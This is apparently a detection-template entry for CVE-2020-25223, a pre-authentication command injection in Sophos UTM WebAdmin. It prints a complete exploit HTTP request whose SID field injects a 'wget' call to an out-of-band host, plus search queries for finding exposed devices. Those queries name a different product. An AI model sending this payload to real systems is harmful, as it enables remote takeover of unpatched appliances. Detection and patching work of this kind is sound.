| Title | Sophos UTM Preauth - Remote Code Execution |
|---|---|
| Author | gy741 |
| Severity | Critical |
| Impact | Successful exploitation of this vulnerability could lead to remote code execution, allowing attackers to take control of the affected system. |
| Remediation | Apply the latest security patches provided by Sophos to mitigate the vulnerability. |
| CVSS Score | 9.8 |
| EPSS Score | 0.94415 |
| CVE ID | CVE-2020-25223 |
| CWE ID | CWE-78 |
| Shodan Query | http.title:"securepoint utm" |
| Fofa Query | title="securepoint utm" |
| Tags | cve cve2020 sophos rce oast unauth kev vkev vuln |
Sophos SG UTMA WebAdmin is susceptible to a remote code execution vulnerability in versions before v9.705 MR5, v9.607 MR7, and v9.511 MR11.
POST /var HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Content-Length: 262
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.5
Connection: close
Content-Type: application/json; charset=UTF-8
Origin: http://www.victim.com
Referer: http://www.victim.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Prototype-Version: 1.5.1.1
X-Requested-With: XMLHttpRequest
{"objs": [{"FID": "init"}], "SID": "|wget http://d5jopf9le0o48v0b2ak06sarzmjkewuei.oast.site|", "browser": "gecko_linux", "backend_version": -1, "loc": "", "_cookie": null, "wdebug": 0, "RID": "1629210675639_0.5000855117488202", "current_uuid": "", "ipv6": true}
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-25223.yaml
🦈 Packet Capture: ⬇️ Download cve-2020-25223.pcap
N/AN/A